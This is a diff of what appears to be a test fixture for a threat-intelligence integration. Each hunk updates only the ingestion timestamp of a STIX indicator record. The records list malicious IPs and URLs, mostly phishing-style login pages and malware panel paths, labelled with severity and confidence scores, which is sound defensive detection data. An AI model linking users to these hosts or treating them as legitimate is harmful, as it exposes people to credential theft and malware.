"event": { - "ingested": "2021-12-13T08:38:40.026543200Z", + "ingested": "2021-12-14T14:57:43.118461578Z", "original": "{\"created\":\"2020-02-25T02:52:37.329Z\",\"description\":\"TS ID: 55347597509; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--ae58138e-b594-4519-adb0-6dbbd8377b75\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:52:37.329Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:37.329Z\"}", "category": "threat", "type": "indicator", @@ -30480,7 +30480,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026548900Z", + "ingested": "2021-12-14T14:57:43.118461958Z", "original": "{\"created\":\"2020-02-25T02:52:38.025Z\",\"description\":\"TS ID: 55347597663; iType: mal_ip; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--4c51e9ac-be12-496c-a2d0-7e3536243aef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-39\"],\"modified\":\"2020-02-25T02:52:38.025Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.025Z\"}", "category": "threat", "type": "indicator", @@ -30532,7 +30532,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026555600Z", + "ingested": "2021-12-14T14:57:43.118462343Z", "original": "{\"created\":\"2020-02-25T02:52:38.053Z\",\"description\":\"TS ID: 55347597470; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--c36b85d9-df19-439b-8605-d7c4b0653977\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:52:38.053Z\",\"name\":\"mal_url: http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.053Z\"}", "category": "threat", "type": "indicator", @@ -30584,7 +30584,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026562300Z", + "ingested": "2021-12-14T14:57:43.118462735Z", "original": "{\"created\":\"2020-02-25T02:52:38.531Z\",\"description\":\"TS ID: 55347597659; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--862bddc3-1b58-45b2-a40d-502d50369e0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-96\"],\"modified\":\"2020-02-25T02:52:38.531Z\",\"name\":\"mal_url: http://jusqit.com/2/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jusqit.com/2/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.531Z\"}", "category": "threat", "type": "indicator", @@ -30635,7 +30635,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026569100Z", + "ingested": "2021-12-14T14:57:43.118463162Z", "original": "{\"created\":\"2020-02-25T02:52:38.564Z\",\"description\":\"TS ID: 55347597488; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--d16f564b-6c1f-4515-97e7-d9a19515dd78\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-25T02:52:38.564Z\",\"name\":\"mal_url: http://webupdateadobe.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://webupdateadobe.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.564Z\"}", "category": "threat", "type": "indicator", @@ -30687,7 +30687,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026575900Z", + "ingested": "2021-12-14T14:57:43.118463568Z", "original": "{\"created\":\"2020-02-25T02:52:40.276Z\",\"description\":\"TS ID: 55347597520; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--2c31e18b-164e-42bc-afd8-04815a33e043\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:52:40.276Z\",\"name\":\"mal_url: http://gsddfsfasa.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gsddfsfasa.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:40.276Z\"}", "category": "threat", "type": "indicator", @@ -30732,7 +30732,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026582500Z", + "ingested": "2021-12-14T14:57:43.118463988Z", "original": "{\"created\":\"2020-02-25T02:52:40.317Z\",\"description\":\"TS ID: 55347597516; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8b22f126-3c79-4d20-8e8c-96e50c384ddf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-25T02:52:40.317Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:40.317Z\"}", "category": "threat", "type": "indicator", @@ -30784,7 +30784,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026589200Z", + "ingested": "2021-12-14T14:57:43.118464437Z", "original": "{\"created\":\"2020-02-25T02:52:40.344Z\",\"description\":\"TS ID: 55347597474; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--387937df-4030-4cfe-91b7-bd9795985adc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:52:40.344Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:40.344Z\"}", "category": "threat", "type": "indicator", @@ -30829,7 +30829,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026596100Z", + "ingested": "2021-12-14T14:57:43.118464826Z", "original": "{\"created\":\"2020-02-25T02:52:41.781Z\",\"description\":\"TS ID: 55347597465; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--fca5d6b6-f486-4a46-a8a6-a1a6cb078a08\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-25T02:52:41.781Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:41.781Z\"}", "category": "threat", "type": "indicator", @@ -30881,7 +30881,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026603Z", + "ingested": "2021-12-14T14:57:43.118465281Z", "original": "{\"created\":\"2020-02-25T02:52:52.59Z\",\"description\":\"TS ID: 55347597566; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--4f92667a-5e1b-4111-88d4-e3e04405e97a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:52:52.59Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/10/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/10/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.59Z\"}", "category": "threat", "type": "indicator", @@ -30933,7 +30933,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026609600Z", + "ingested": "2021-12-14T14:57:43.118465805Z", "original": "{\"created\":\"2020-02-25T02:52:52.623Z\",\"description\":\"TS ID: 55347597530; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--04bc5b54-46ae-44d7-96a6-863481383436\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:52:52.623Z\",\"name\":\"mal_url: http://anypontop.com/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://anypontop.com/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.623Z\"}", "category": "threat", "type": "indicator", @@ -30978,7 +30978,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026616300Z", + "ingested": "2021-12-14T14:57:43.118466530Z", "original": "{\"created\":\"2020-02-25T02:52:52.674Z\",\"description\":\"TS ID: 55347597522; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--65a5607b-388a-4789-98d0-84d77ee94047\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-25T02:52:52.674Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.674Z\"}", "category": "threat", "type": "indicator", @@ -31030,7 +31030,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026645200Z", + "ingested": "2021-12-14T14:57:43.118466913Z", "original": "{\"created\":\"2020-02-25T02:52:52.712Z\",\"description\":\"TS ID: 55347597467; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--b70344da-8137-4550-b569-97f0e3020ab1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-25T02:52:52.712Z\",\"name\":\"mal_url: http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.712Z\"}", "category": "threat", "type": "indicator", @@ -31075,7 +31075,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026672Z", + "ingested": "2021-12-14T14:57:43.118467452Z", "original": "{\"created\":\"2020-02-25T02:52:55.912Z\",\"description\":\"TS ID: 55347597506; iType: mal_ip; State: active; Org: Leaseweb Deutschland GmbH; Source: CyberCrime\",\"id\":\"indicator--3ff92876-fac4-49a6-ae80-d123206dc224\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-25T02:52:55.912Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:55.912Z\"}", "category": "threat", "type": "indicator", @@ -31126,7 +31126,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026680300Z", + "ingested": "2021-12-14T14:57:43.118467921Z", "original": "{\"created\":\"2020-02-25T02:53:04.191Z\",\"description\":\"TS ID: 55347597485; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--cb9b2721-6623-44c2-b1e5-143f2291738b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-25T02:53:04.191Z\",\"name\":\"mal_url: http://belt-yard-74.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://belt-yard-74.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:04.191Z\"}", "category": "threat", "type": "indicator", @@ -31178,7 +31178,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026684500Z", + "ingested": "2021-12-14T14:57:43.118468441Z", "original": "{\"created\":\"2020-02-25T02:53:12.657Z\",\"description\":\"TS ID: 55347597478; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--04c56a59-3a16-4284-9edc-5445bb539ce5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:53:12.657Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:12.657Z\"}", "category": "threat", "type": "indicator", @@ -31230,7 +31230,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026687900Z", + "ingested": "2021-12-14T14:57:43.118468833Z", "original": "{\"created\":\"2020-02-25T02:53:15.804Z\",\"description\":\"TS ID: 55347597559; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--1989ffaf-19a7-4850-b142-d31758a3751f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:53:15.804Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/11/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/11/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:15.804Z\"}", "category": "threat", "type": "indicator", @@ -31275,7 +31275,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026692900Z", + "ingested": "2021-12-14T14:57:43.118469399Z", "original": "{\"created\":\"2020-02-25T02:53:15.88Z\",\"description\":\"TS ID: 55347597483; iType: mal_ip; State: active; Org: Datalot; Source: CyberCrime\",\"id\":\"indicator--66939f56-1a6f-43d1-b7a4-277e3ac55584\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-25T02:53:15.88Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:15.88Z\"}", "category": "threat", "type": "indicator", @@ -31327,7 +31327,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026698Z", + "ingested": "2021-12-14T14:57:43.118469842Z", "original": "{\"created\":\"2020-02-25T02:53:17.191Z\",\"description\":\"TS ID: 55347597555; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--fe0a731e-e2ff-49ac-a597-150ce46a31fc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:53:17.191Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/12/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/12/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.191Z\"}", "category": "threat", "type": "indicator", @@ -31379,7 +31379,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026704400Z", + "ingested": "2021-12-14T14:57:43.118470296Z", "original": "{\"created\":\"2020-02-25T02:53:17.224Z\",\"description\":\"TS ID: 55347597468; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--53d00201-4c9a-4275-9091-4cf08fda4676\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:53:17.224Z\",\"name\":\"mal_url: http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.224Z\"}", "category": "threat", "type": "indicator", @@ -31431,7 +31431,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026711300Z", + "ingested": "2021-12-14T14:57:43.118470712Z", "original": "{\"created\":\"2020-02-25T02:53:17.256Z\",\"description\":\"TS ID: 55347597466; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--4e154929-35ec-4f71-8793-6b861a9a98f1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-25T02:53:17.256Z\",\"name\":\"mal_url: http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.256Z\"}", "category": "threat", "type": "indicator", @@ -31483,7 +31483,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026718200Z", + "ingested": "2021-12-14T14:57:43.118471196Z", "original": "{\"created\":\"2020-02-25T02:53:17.916Z\",\"description\":\"TS ID: 55347597583; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--4ce097b7-254b-41cf-8c7d-934524548fd6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:53:17.916Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/8/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/8/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.916Z\"}", "category": "threat", "type": "indicator", @@ -31535,7 +31535,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026725Z", + "ingested": "2021-12-14T14:57:43.118471593Z", "original": "{\"created\":\"2020-02-25T02:53:17.952Z\",\"description\":\"TS ID: 55347597508; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--51f063d7-600f-43c3-9f88-92e4b3b603da\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:53:17.952Z\",\"name\":\"mal_url: http://petrouretro.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://petrouretro.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.952Z\"}", "category": "threat", "type": "indicator", @@ -31587,7 +31587,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026731800Z", + "ingested": "2021-12-14T14:57:43.118471983Z", "original": "{\"created\":\"2020-02-25T02:53:17.983Z\",\"description\":\"TS ID: 55347597481; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--5c9b2227-96df-4cc8-ba6b-c23f4da9667a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-25T02:53:17.983Z\",\"name\":\"mal_url: http://imperiaskygarden.net/.choo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://imperiaskygarden.net/.choo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.983Z\"}", "category": "threat", "type": "indicator", @@ -31639,7 +31639,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026738600Z", + "ingested": "2021-12-14T14:57:43.118472484Z", "original": "{\"created\":\"2020-02-25T02:53:36.323Z\",\"description\":\"TS ID: 55347597534; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--751b74f4-ded7-426d-b425-cb9c2b3113a8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:53:36.323Z\",\"name\":\"mal_url: http://agmardorecha.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://agmardorecha.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:36.323Z\"}", "category": "threat", "type": "indicator", @@ -31690,7 +31690,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026745400Z", + "ingested": "2021-12-14T14:57:43.118472937Z", "original": "{\"created\":\"2020-02-25T02:53:36.382Z\",\"description\":\"TS ID: 55347597492; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--4fcbf6f5-5acc-42da-acb0-497583b3388d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-25T02:53:36.382Z\",\"name\":\"mal_url: http://149.28.186.68/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://149.28.186.68/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:36.382Z\"}", "category": "threat", "type": "indicator", @@ -31742,7 +31742,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026752200Z", + "ingested": "2021-12-14T14:57:43.118473406Z", "original": "{\"created\":\"2020-02-25T02:53:36.421Z\",\"description\":\"TS ID: 55347597464; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--713e0d5f-3842-410f-98d8-25fe0f5b15db\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-25T02:53:36.421Z\",\"name\":\"mal_url: http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/dope/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:36.421Z\"}", "category": "threat", "type": "indicator", @@ -31793,7 +31793,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026759100Z", + "ingested": "2021-12-14T14:57:43.118473833Z", "original": "{\"created\":\"2020-02-25T02:53:42.111Z\",\"description\":\"TS ID: 55347597500; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--895a994a-7833-47fe-a832-fc3ce5f070a5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-25T02:53:42.111Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:42.111Z\"}", "category": "threat", "type": "indicator", @@ -31845,7 +31845,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026765900Z", + "ingested": "2021-12-14T14:57:43.118474314Z", "original": "{\"created\":\"2020-02-25T02:54:16.295Z\",\"description\":\"TS ID: 55347597622; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--86fd616d-f6a3-45ff-a3a8-db1aa59defd9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:54:16.295Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/4/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/4/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:16.295Z\"}", "category": "threat", "type": "indicator", @@ -31897,7 +31897,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026772600Z", + "ingested": "2021-12-14T14:57:43.118474705Z", "original": "{\"created\":\"2020-02-25T02:54:21.544Z\",\"description\":\"TS ID: 55347597482; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--57fb3a6f-09ca-44a2-b309-724b570e1fd9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-25T02:54:21.544Z\",\"name\":\"mal_url: http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://klickus.com/bin/cgi/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:21.544Z\"}", "category": "threat", "type": "indicator", @@ -31949,7 +31949,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026779400Z", + "ingested": "2021-12-14T14:57:43.118475137Z", "original": "{\"created\":\"2020-02-25T02:54:32.178Z\",\"description\":\"TS ID: 55347597608; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--1b2dfaef-5caa-4114-9634-cf2f9959dbfb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:54:32.178Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/5/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/5/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:32.178Z\"}", "category": "threat", "type": "indicator", @@ -32001,7 +32001,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026786100Z", + "ingested": "2021-12-14T14:57:43.118475606Z", "original": "{\"created\":\"2020-02-25T02:54:37.327Z\",\"description\":\"TS ID: 55347597484; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--44544bfd-7131-4530-a9de-96c1840101c1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:54:37.327Z\",\"name\":\"mal_url: http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/copy/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:37.327Z\"}", "category": "threat", "type": "indicator", @@ -32052,7 +32052,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026789400Z", + "ingested": "2021-12-14T14:57:43.118476107Z", "original": "{\"created\":\"2020-02-25T02:54:37.383Z\",\"description\":\"TS ID: 55347597463; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--51779de2-0d07-4d60-abf6-afdc0dfc7637\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-25T02:54:37.383Z\",\"name\":\"mal_url: http://0ooo.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://0ooo.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:54:37.383Z\"}", "category": "threat", "type": "indicator", @@ -32104,7 +32104,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026794400Z", + "ingested": "2021-12-14T14:57:43.118476544Z", "original": 